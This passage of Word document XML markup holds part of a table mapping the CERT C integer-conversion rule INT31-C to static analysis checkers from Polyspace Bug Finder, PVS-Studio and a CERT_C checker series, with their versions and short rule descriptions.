                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-b</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-d</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-e</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-f</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-g</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-h</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-i</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-j</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-k</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-l</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-m</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-n</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-o</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT_C-INT31-p</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="004A0AAD" w14:textId="576E25C4"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An expression of essentially Boolean type should always be used where an operand is interpreted as a Boolean value</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>An operand of essentially Boolean type should not be used where an operand is interpreted as a numeric value</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>An operand of essentially character type should not be used where an operand is interpreted as a numeric value</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">An operand of essentially </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>enum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> type should not be used in an arithmetic operation</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">Shift and bitwise operations should not be performed on operands of essentially signed or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>enum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">An operand of essentially signed or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>enum</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> type should not be used as the right hand operand to the bitwise shifting operator</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t xml:space="preserve">An operand of essentially unsigned type should not be used as the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>operand to the unary minus operator</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>The value of an expression shall not be assigned to an object with a narrower essential type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>The value of an expression shall not be assigned to an object of a different essential type category</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Both operands of an operator in which the usual arithmetic conversions are performed shall have the same essential type category</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>The second and third operands of the ternary operator shall have the same essential type category</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>The value of a composite expression shall not be assigned to an object with wider essential type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>If a composite expression is used as one operand of an operator in which the usual arithmetic conversions are performed then the other operand shall not have wider essential type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>If a composite expression is used as one (second or third) operand of a conditional operator then the other operand shall not have wider essential type</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Avoid data loss when converting between integer types</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:br/>
              <w:t>Avoid value change when converting between integer types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D01F68" w14:paraId="2898A02B" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32C20E4F" w14:textId="37ABAD31" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId28" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Polyspace</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bug Finder</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59ABCDE1" w14:textId="501FF43C" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F6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R2024a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74E98DEA" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId29" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CERT C: Rule INT31-C</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="2F062122" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3EF64E55" w14:textId="77777777"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6A6A6A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Checks for:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A27E454" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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Integer conversion overflow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="376F2F00" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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 xml:space="preserve">Call to </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="6A6A6A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>memset</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="6A6A6A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> with unintended value</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F6AED97" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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Sign change integer conversion overflow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0429847D" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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Tainted sign change conversion</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47CC5F97" w14:textId="77777777" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F68">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Unsigned integer conversion overflow</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1931DA83" w14:textId="067BF5D5"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6A6A6A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Rule partially covered.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D01F68" w14:paraId="0CE5FC6E" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="457B94C2" w14:textId="5C9294EA" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId30" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>PVS-Studio</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3106A142" w14:textId="7E67B91C" w:rsidR="00D01F68" w:rsidRDefault="00D01F68" w:rsidP="00D01F6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7.31</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66651F17" w14:textId="6C355AC9" w:rsidR="00D01F68" w:rsidRDefault="00000000" w:rsidP="00D01F68">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId31" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Strong"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>V562</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId32" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Strong"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>V569</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId33" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Strong"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>V642</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId34" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V676</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, </w:t>
            </w:r>
            <w:hyperlink r:id="rId35" w:history="1">
              <w:r w:rsidR="00D01F68">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:b/>
                  <w:bCs/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>V716</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00D01F68">
              <w:rPr>
